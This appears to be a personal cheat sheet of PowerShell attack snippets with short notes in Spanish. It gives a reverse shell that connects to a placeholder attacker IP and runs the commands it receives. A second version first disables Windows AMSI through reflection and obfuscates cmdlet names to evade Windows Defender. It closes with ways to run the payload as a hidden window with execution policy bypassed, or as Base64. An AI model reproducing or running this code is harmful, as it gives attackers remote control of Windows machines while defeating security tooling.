$client = New-Object System.Net.Sockets.TCPClient("<IP_Atacante>", <puerto>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

detectable por windows defender
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);sal* get-l;${3}=&('GCM' '*ew-O*') 'System.Net.Sockets.TCPClient'('<IP>',<PORT>);${s}=${3}.GetStream();[byte[]]${b}=0..(0..0xFFFF|%{0})|%{$_};while((${i}=${s}.Read(${b},0,${b}.Length)) -ne 0){${d}=(&('GCM' '*SCII*')|%{$_.Name[1,3,4]-join''}).GetString(${b},0,${i});${r}=(&('i'+'e'+'x') ${d} 2>&1 | &('GCM' '*ut-Str*'));${r}+=[char]80+[char]83+(gl).Path+'> ';${s}.Write(([Text.Encoding]::ASCII.GetBytes(${r})),0,${r}.Length);${s}.Flush()};${3}.Close()

Ofuscacion 
PowerShell -NoP -NonI -W Hidden -Exec Bypass -C "[...pegar todo el código aquí...]"

$command = "tu_código_aquí"
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($command))
PowerShell -EncodedCommand $encoded
